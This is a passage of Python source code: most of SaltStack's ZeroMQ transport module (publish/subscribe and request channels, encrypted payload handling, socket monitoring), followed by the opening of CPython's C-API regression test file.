self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, b'broadcast')
if self.opts.get('__role') == 'syndic':
self._socket.setsockopt(zmq.SUBSCRIBE, b'syndic')
else:
self._socket.setsockopt(
zmq.SUBSCRIBE,
salt.utils.stringutils.to_bytes(self.hexid)
)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, b'')
self._socket.setsockopt(zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts['id']))
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, 'TCP_KEEPALIVE'):
self._socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'])
log.debug(
"Generated random reconnect delay between '%sms' and '%sms' (%s)",
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay
)
log.debug("Setting zmq_reconnect_ivl to '%sms'", recon_delay)
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug(
"Setting zmq_reconnect_ivl_max to '%sms'",
self.opts['recon_default'] + self.opts['recon_max']
)
self._socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if (self.opts['ipv6'] is True or ':' in self.opts['master_ip']) and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def close(self):
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, '_stream'):
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
self._stream.io_loop.remove_handler(self._stream.socket)
self._stream.socket.close(0)
else:
self._stream.close(0)
elif hasattr(self, '_socket'):
self._socket.close(0)
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def destroy(self):
# Bacwards compat
salt.utils.versions.warn_until(
'Sodium',
'Calling {0}.destroy() is deprecated. Please call {0}.close() instead.'.format(
self.__class__.__name__
),
stacklevel=3
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@salt.ext.tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
# if this is changed from the default, we assume it was intentional
if int(self.opts.get('publish_port', 4506)) != 4506:
self.publish_port = self.opts.get('publish_port')
# else take the relayed publish_port master reports
else:
self.publish_port = self.auth.creds['publish_port']
log.debug('Connecting the Minion to the Master publish port, using the URI: %s', self.master_pub)
self._socket.connect(self.master_pub)
@property
def master_pub(self):
'''
Return the master publish port
'''
return _get_master_uri(self.opts['master_ip'],
self.publish_port,
source_ip=self.opts.get('source_ip'),
source_port=self.opts.get('source_publish_port'))
@salt.ext.tornado.gen.coroutine
def _decode_messages(self, messages):
'''
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
'''
messages_len = len(messages)
# if it was one message, then its old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
message_target = salt.utils.stringutils.to_str(messages[0])
if (self.opts.get('__role') != 'syndic' and message_target not in ('broadcast', self.hexid)) or \
(self.opts.get('__role') == 'syndic' and message_target not in ('broadcast', 'syndic')):
log.debug('Publish received for not this minion: %s', message_target)
raise salt.ext.tornado.gen.Return(None)
payload = self.serial.loads(messages[1])
else:
raise Exception(('Invalid number of messages ({0}) in zeromq pub'
'message from master').format(len(messages_len)))
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise salt.ext.tornado.gen.Return(ret)
@property
def stream(self):
'''
Return the current zmqstream, creating one if necessary
'''
if not hasattr(self, '_stream'):
self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
return self._stream
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
'''
if callback is None:
return self.stream.on_recv(None)
@salt.ext.tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
if payload is not None:
callback(payload)
return self.stream.on_recv(wrap_callback)
class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin,
salt.transport.server.ReqServerChannel):
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._closing = False
def zmq_device(self):
'''
Multiprocessing target for the zmq queue device
'''
self.__setup_signals()
salt.utils.process.appendproctitle('MWorkerQueue')
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
self.clients.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
self._start_zmq_monitor()
self.workers = self.context.socket(zmq.DEALER)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
if self.clients.closed or self.workers.closed:
break
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
six.reraise(*sys.exc_info())
except (KeyboardInterrupt, SystemExit):
break
def close(self):
'''
Cleanly shutdown the router socket
'''
if self._closing:
return
log.info('MWorkerQueue under PID %s is closing', os.getpid())
self._closing = True
# pylint: disable=E0203
if getattr(self, '_monitor', None) is not None:
self._monitor.stop()
self._monitor = None
if getattr(self, '_w_monitor', None) is not None:
self._w_monitor.stop()
self._w_monitor = None
if hasattr(self, 'clients') and self.clients.closed is False:
self.clients.close()
if hasattr(self, 'workers') and self.workers.closed is False:
self.workers.close()
if hasattr(self, 'stream'):
self.stream.close()
if hasattr(self, '_socket') and self._socket.closed is False:
self._socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
# pylint: enable=E0203
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def _start_zmq_monitor(self):
'''
Starts ZMQ monitor for debugging purposes.
:return:
'''
# Socket monitor shall be used the only for debug
# purposes so using threading doesn't look too bad here
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
log.debug('Starting ZMQ monitor')
import threading
self._w_monitor = ZeroMQSocketMonitor(self._socket)
threading.Thread(target=self._w_monitor.start_poll).start()
log.debug('ZMQ monitor has been started started')
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
:param func payload_handler: A function to called to handle incoming payloads as
they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
self._start_zmq_monitor()
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket %s', self.w_uri)
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
self.stream.on_recv_stream(self.handle_message)
@salt.ext.tornado.gen.coroutine
def handle_message(self, stream, payload):
'''
Handle incoming messages from underlying TCP streams
:stream ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
'''
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as exc: # pylint: disable=broad-except
exc_type = type(exc).__name__
if exc_type == 'AuthenticationError':
log.debug(
'Minion failed to auth to master. Since the payload is '
'encrypted, it is not known which minion failed to '
'authenticate. It is likely that this is a transient '
'failure due to the master rotating its public key.'
)
else:
log.error('Bad load from minion: %s: %s', exc_type, exc)
stream.send(self.serial.dumps('bad load'))
raise salt.ext.tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
log.error('payload and load must be a dict. Payload was: %s and load was %s', payload, payload.get('load'))
stream.send(self.serial.dumps('payload and load must be a dict'))
raise salt.ext.tornado.gen.Return()
try:
id_ = payload['load'].get('id', '')
if str('\0') in id_:
log.error('Payload contains an id with a null byte: %s', payload)
stream.send(self.serial.dumps('bad load: id contains a null byte'))
raise salt.ext.tornado.gen.Return()
except TypeError:
log.error('Payload contains non-string id: %s', payload)
stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_)))
raise salt.ext.tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
stream.send(self.serial.dumps(self._auth(payload['load'])))
raise salt.ext.tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e: # pylint: disable=broad-except
# always attempt to return an error to the minion
stream.send('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
raise salt.ext.tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.send(self.serial.dumps(ret))
elif req_fun == 'send':
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == 'send_private':
stream.send(self.serial.dumps(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
)))
else:
log.error('Unknown req_fun %s', req_fun)
# always attempt to return an error to the minion
stream.send('Server-side exception handling payload')
raise salt.ext.tornado.gen.Return()
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
self.close()
sys.exit(salt.defaults.exitcodes.EX_OK)
def _set_tcp_keepalive(zmq_socket, opts):
'''
Ensure that TCP keepalives are set as specified in "opts".
Warning: Failure to set TCP keepalives on the salt-master can result in
not detecting the loss of a minion when the connection is lost or when
it's host has been terminated without first closing the socket.
Salt's Presence System depends on this connection status to know if a minion
is "present".
Warning: Failure to set TCP keepalives on minions can result in frequent or
unexpected disconnects!
'''
if hasattr(zmq, 'TCP_KEEPALIVE') and opts:
if 'tcp_keepalive' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE, opts['tcp_keepalive']
)
if 'tcp_keepalive_idle' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, opts['tcp_keepalive_idle']
)
if 'tcp_keepalive_cnt' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, opts['tcp_keepalive_cnt']
)
if 'tcp_keepalive_intvl' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, opts['tcp_keepalive_intvl']
)
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
'''
Encapsulate synchronous operations for a publisher channel
'''
_sock_data = threading.local()
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(self.opts)
def connect(self):
return salt.ext.tornado.gen.sleep(5)
def _publish_daemon(self, log_queue=None):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
if log_queue:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
_set_tcp_keepalive(pub_sock, self.opts)
# if 2.1 >= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000))
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_sock.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
pub_sock.setsockopt(zmq.LINGER, -1)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
pull_sock.setsockopt(zmq.LINGER, -1)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info('Starting the Salt Publisher on %s', pub_uri)
pub_sock.bind(pub_uri)
# Securely create socket
log.info('Starting the Salt Puller on %s', pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.bind(pull_uri)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
log.debug('Publish daemon getting data from puller %s', pull_uri)
package = pull_sock.recv()
log.debug('Publish daemon received payload. size=%d', len(package))
unpacked_package = salt.payload.unpackage(package)
if six.PY3:
unpacked_package = salt.transport.frame.decode_embedded_strs(unpacked_package)
payload = unpacked_package['payload']
log.trace('Accepted unpacked package from puller')
if self.opts['zmq_filtering']:
# if you have a specific topic list, use that
if 'topic_lst' in unpacked_package:
for topic in unpacked_package['topic_lst']:
log.trace('Sending filtered data over publisher %s', pub_uri)
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = salt.utils.stringutils.to_bytes(hashlib.sha1(salt.utils.stringutils.to_bytes(topic)).hexdigest())
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Filtered data has been sent')
# Syndic broadcast
if self.opts.get('order_masters'):
log.trace('Sending filtered data to syndic')
pub_sock.send(b'syndic', flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Filtered data has been sent to syndic')
# otherwise its a broadcast
else:
# TODO: constants file for "broadcast"
log.trace('Sending broadcasted data over publisher %s', pub_uri)
pub_sock.send(b'broadcast', flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Broadcasted data has been sent')
else:
log.trace('Sending ZMQ-unfiltered data over publisher %s', pub_uri)
pub_sock.send(payload)
log.trace('Unfiltered data has been sent')
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
six.reraise(*sys.exc_info())
except KeyboardInterrupt:
log.trace('Publish daemon caught Keyboard interupt, tearing down')
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.close()
if pull_sock.closed is False:
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager, kwargs=None):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
'''
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
@property
def pub_sock(self):
'''
This thread's zmq publisher socket. This socket is stored on the class
so that multiple instantiations in the same thread will re-use a single
zmq socket.
'''
try:
return self._sock_data.sock
except AttributeError:
pass
def pub_connect(self):
'''
Create and connect this thread's zmq socket. If a publisher socket
already exists "pub_close" is called before creating and connecting a
new socket.
'''
if self.pub_sock:
self.pub_close()
ctx = zmq.Context.instance()
self._sock_data.sock = ctx.socket(zmq.PUSH)
self.pub_sock.setsockopt(zmq.LINGER, -1)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
log.debug("Connecting to pub server: %s", pull_uri)
self.pub_sock.connect(pull_uri)
return self._sock_data.sock
def pub_close(self):
'''
Disconnect an existing publisher socket and remove it from the local
thread's cache.
'''
if hasattr(self._sock_data, 'sock'):
self._sock_data.sock.close()
delattr(self._sock_data, 'sock')
def publish(self, load):
'''
Publish "load" to minions. This send the load to the publisher daemon
process with does the actual sending to minions.
:param dict load: A load to be sent across the wire to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
# If zmq_filtering is enabled, target matching has to happen master side
match_targets = ["pcre", "glob", "list"]
if self.opts['zmq_filtering'] and load['tgt_type'] in match_targets:
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load['tgt'],
tgt_type=load['tgt_type'])
match_ids = _res['minions']
log.debug("Publish Side Match: %s", match_ids)
# Send list of miions thru so zmq can target them
int_payload['topic_lst'] = match_ids
payload = self.serial.dumps(int_payload)
log.debug(
'Sending payload to publish daemon. jid=%s size=%d',
load.get('jid', None), len(payload),
)
if not self.pub_sock:
self.pub_connect()
self.pub_sock.send(payload)
log.debug('Sent payload to publish daemon.')
class AsyncReqMessageClientPool(salt.transport.MessageClientPool):
'''
Wrapper class of AsyncReqMessageClientPool to avoid blocking waiting while writing data to socket.
'''
def __init__(self, opts, args=None, kwargs=None):
super(AsyncReqMessageClientPool, self).__init__(AsyncReqMessageClient, opts, args=args, kwargs=kwargs)
self._closing = False
def close(self):
if self._closing:
return
self._closing = True
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def destroy(self):
# Bacwards compat
salt.utils.versions.warn_until(
'Sodium',
'Calling {0}.destroy() is deprecated. Please call {0}.close() instead.'.format(
self.__class__.__name__
),
stacklevel=3
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
# TODO: unit tests!
class AsyncReqMessageClient(object):
'''
This class wraps the underlying zeromq REQ socket and gives a future-based
interface to sending and recieving messages. This works around the primary
limitation of serialized send/recv on the underlying socket by queueing the
message sends in this class. In the future if we decide to attempt to multiplex
we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial
'''
def __init__(self, opts, addr, linger=0, io_loop=None):
'''
Create an asynchronous message client
:param dict opts: The salt opts dictionary
:param str addr: The interface IP address to bind to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
'''
self.opts = opts
self.addr = addr
self.linger = linger
if io_loop is None:
self.io_loop = salt.ext.tornado.ioloop.IOLoop.current()
else:
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
self._closing = False
# TODO: timeout all in-flight sessions, or error
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, 'stream') and self.stream is not None:
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.socket.close()
else:
self.stream.close()
self.socket = None
self.stream = None
if self.context.closed is False:
self.context.term()
def destroy(self):
# Bacwards compat
salt.utils.versions.warn_until(
'Sodium',
'Calling {0}.destroy() is deprecated. Please call {0}.close() instead.'.format(
self.__class__.__name__
),
stacklevel=3
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _init_socket(self):
if hasattr(self, 'stream'):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, 5000
)
_set_tcp_keepalive(self.socket, self.opts)
if self.addr.startswith('tcp://['):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, 'IPV6'):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, 'IPV4ONLY'):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
log.debug('Trying to connect to: %s', self.addr)
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop)
@salt.ext.tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue[0]
future = self.send_future_map.get(message, None)
if future is None:
# Timedout
del self.send_queue[0]
continue
# send
def mark_future(msg):
if not future.done():
data = self.serial.loads(msg[0])
future.set_result(data)
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except Exception as err: # pylint: disable=broad-except
log.debug('Re-init ZMQ socket: %s', err)
self._init_socket() # re-init the zmq socket (no other way in zmq)
del self.send_queue[0]
continue
del self.send_queue[0]
self.send_future_map.pop(message, None)
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message, None)
if timeout is not None:
# Hasn't been already timedout
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
'''
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
'''
future = self.send_future_map.pop(message, None)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
del self.send_timeout_map[message]
if future.attempts < future.tries:
future.attempts += 1
log.debug('SaltReqTimeoutError, retrying. (%s/%s)', future.attempts, future.tries)
self.send(
message,
timeout=future.timeout,
tries=future.tries,
future=future,
)
else:
future.set_exception(SaltReqTimeoutError('Message timed out'))
def send(self, message, timeout=None, tries=3, future=None, callback=None, raw=False):
'''
Return a future which will be completed when the message has a response
'''
if future is None:
future = salt.ext.tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
# if a future wasn't passed in, we need to serialize the message
message = self.serial.dumps(message)
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if self.opts.get('detect_mode') is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
class ZeroMQSocketMonitor(object):
__EVENT_MAP = None
def __init__(self, socket):
'''
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
'''
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
try:
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
except (AttributeError, zmq.error.ContextTerminated):
# We cannot log here because we'll get an interrupted system call in trying
# to flush the logging buffer as we terminate
pass
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt['description'] = self.event_map[evt['event']]
log.debug("ZeroMQ event: %s", evt)
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import os
import pickle
import random
import re
import subprocess
import sys
import sysconfig
import textwrap
import threading
import time
import unittest
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
